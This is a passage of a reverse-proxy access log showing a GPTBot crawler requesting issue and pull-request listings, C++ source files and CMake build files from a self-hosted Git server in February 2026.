AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" -[17/Feb/2026:19:18:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_codec.cpp?display=source" [Client 74.7.227.38] [Length 13567] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:19:19:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_codec.cpp?display=source" [Client 74.7.227.38] [Length 13567] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:19:19:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_codec.cpp?display=source" [Client 74.7.227.38] [Length 13534] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:19:19:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_codec.cpp?display=source" [Client 74.7.227.38] [Length 13567] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:19:19:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11311] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:19:19:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10063] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:19:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10093] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:19:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10089] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:19:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10264] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:19:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10081] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:19:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10250] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:19:19:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10082] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:19:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10083] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:19:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10255] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:19:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10258] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:19:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:19:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:19:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&sort=nearduedate&state=open&type=all" -[17/Feb/2026:19:19:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15408] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:19:19:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_codec.cpp?display=rendered" [Client 74.7.227.38] [Length 11266] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:19:19:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_codec.cpp?display=source" [Client 74.7.227.38] [Length 13568] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:19:19:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&project=-1&state=open&type=all" -[17/Feb/2026:19:19:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10226] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:19:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:19:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10234] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:19:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10239] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:19:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10238] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:19:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10233] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" -[17/Feb/2026:19:19:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10241] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=leastcomment&state=all&type=all" -[17/Feb/2026:19:19:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10236] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:19:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10237] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:19:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10232] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:19:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10234] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=all&type=all" -[17/Feb/2026:19:19:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10063] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:19:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10065] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:19:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:19:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10068] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastcomment&state=all&type=all" -[17/Feb/2026:19:19:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:19:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10065] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:19:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10069] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:19:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9995] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=farduedate&state=all&type=all" -[17/Feb/2026:19:19:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=mostcomment&state=all&type=all" -[17/Feb/2026:19:19:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10064] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:19:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=recentupdate&state=closed&type=all" -[17/Feb/2026:19:19:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:19:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 9845] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:19:19:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:19:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:19:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9981] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:19:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&state=all&type=all" -[17/Feb/2026:19:19:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10180] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&state=all&type=all" -[17/Feb/2026:19:19:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:19:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:19:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10009] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:19:19:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 